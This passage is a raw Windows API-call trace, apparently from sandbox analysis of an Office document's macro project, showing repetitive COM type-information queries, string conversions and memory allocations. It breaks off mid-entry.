[0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe1, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe2, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe3, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe4, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe5, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe6, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe7, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe8, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe9, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xea, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xeb, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xec, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xed, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xee, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xef, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf0, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf1, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf2, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf3, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf4, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf5, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf6, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf7, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf8, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.240] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.241] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6ce8 | out: ppvObject=0x33e4fb6ce8*=0x1d39d552a68) returned 0x0 [0060.241] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6cf8 | out: pVarVal=0x33e4fb6cf8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b9, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.241] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.241] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6cf0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6c00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.241] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.241] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6ca0 | out: ppvObject=0x33e4fb6ca0*=0x0) returned 0x80004002 [0060.241] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb6cc8, pDummy=0x33e4fb6ca0 | out: ppTypeAttr=0x33e4fb6cc8, pDummy=0x33e4fb6ca0*=0x0) returned 0x0 [0060.241] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.241] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.241] IUnknown:Release (This=0x1d39d552bc8) returned 0x5 [0060.241] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.241] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc0) returned 0x1d39d7d43b0 [0060.241] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d7d43b0) returned 0xc0 [0060.243] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb6f20, pDummy=0x1d39d8e74c0 | out: ppTypeAttr=0x33e4fb6f20, pDummy=0x1d39d8e74c0*=0x7) returned 0x0 [0060.243] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.243] ITypeInfo:GetRefTypeOfImplType (in: This=0x1d39d552b18, index=0x0, pRefType=0x33e4fb6f18 | out: pRefType=0x33e4fb6f18*=0x3) returned 0x0 [0060.243] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d552b18, hreftype=0x3, ppTInfo=0x33e4fb6f28 | out: ppTInfo=0x33e4fb6f28*=0x1d39834a048) returned 0x0 [0060.243] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.243] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39834a048, ppTypeAttr=0x33e4fb6f20, pDummy=0x33e4fb6ef8 | out: ppTypeAttr=0x33e4fb6f20, pDummy=0x33e4fb6ef8*=0x5) returned 0x0 [0060.243] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39834a048) returned 0x0 [0060.243] ITypeInfo:GetRefTypeOfImplType (in: This=0x1d39834a048, index=0x0, pRefType=0x33e4fb6f18 | out: pRefType=0x33e4fb6f18*=0x182) returned 0x0 [0060.243] ITypeInfo:GetRefTypeInfo (in: This=0x1d39834a048, hreftype=0x182, ppTInfo=0x33e4fb6f28 | out: ppTInfo=0x33e4fb6f28*=0x1d39834a0a0) returned 0x0 [0060.244] IUnknown:Release (This=0x1d39834a048) returned 0x2 [0060.244] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39834a0a0, ppTypeAttr=0x33e4fb6f20, pDummy=0x33e4fb6f00 | out: ppTypeAttr=0x33e4fb6f20, pDummy=0x33e4fb6f00*=0xe4fb6f30) returned 0x0 [0060.244] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39834a0a0) returned 0x0 [0060.244] IUnknown:Release (This=0x1d39834a0a0) returned 0x1 [0060.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0161d40718", cchWideChar=11, lpMultiByteStr=0x33e4fb6f10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0161d40718", lpUsedDefaultChar=0x0) returned 11 [0060.244] GetLocalTime (in: lpSystemTime=0x33e4fb6ff8 | out: lpSystemTime=0x33e4fb6ff8*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x29, wMilliseconds=0x210)) [0060.244] _ultow_s (in: _Value=0x61d40719, _Buffer=0x1d39da0dc2c, _BufferCount=0x9, _Radix=16 | out: _Buffer="61d40719") returned 0x0 [0060.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0561d40719", cchWideChar=11, lpMultiByteStr=0x33e4fb6f50, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0561d40719", lpUsedDefaultChar=0x0) returned 11 [0060.244] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x60) returned 0x1d39d8483e0 [0060.244] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d8483e0) returned 0x60 [0060.244] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8483e0) [0060.244] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d98f5d0, cb=0x400) returned 0x1d3984b8a60 [0060.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb6d90, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0060.244] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0060.244] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.244] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6a98 | out: ppvObject=0x33e4fb6a98*=0x1d39d552a68) returned 0x0 [0060.244] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6aa8 | out: pVarVal=0x33e4fb6aa8*(varType=0x0, wReserved1=0xe4fb, wReserved2=0x33, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.244] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.244] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6aa0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6ac0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6ac0*="") returned 0x0 [0060.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb69b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.244] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.245] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb6aa0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb6aa0, pDummy=0x0) returned 0x0 [0060.245] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x0, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x10, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x11, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.245] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x12, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x13, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x14, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x15, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x16, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x17, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x18, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x19, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x20, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x21, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x22, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x23, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x24, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.246] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x25, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x26, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x27, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc 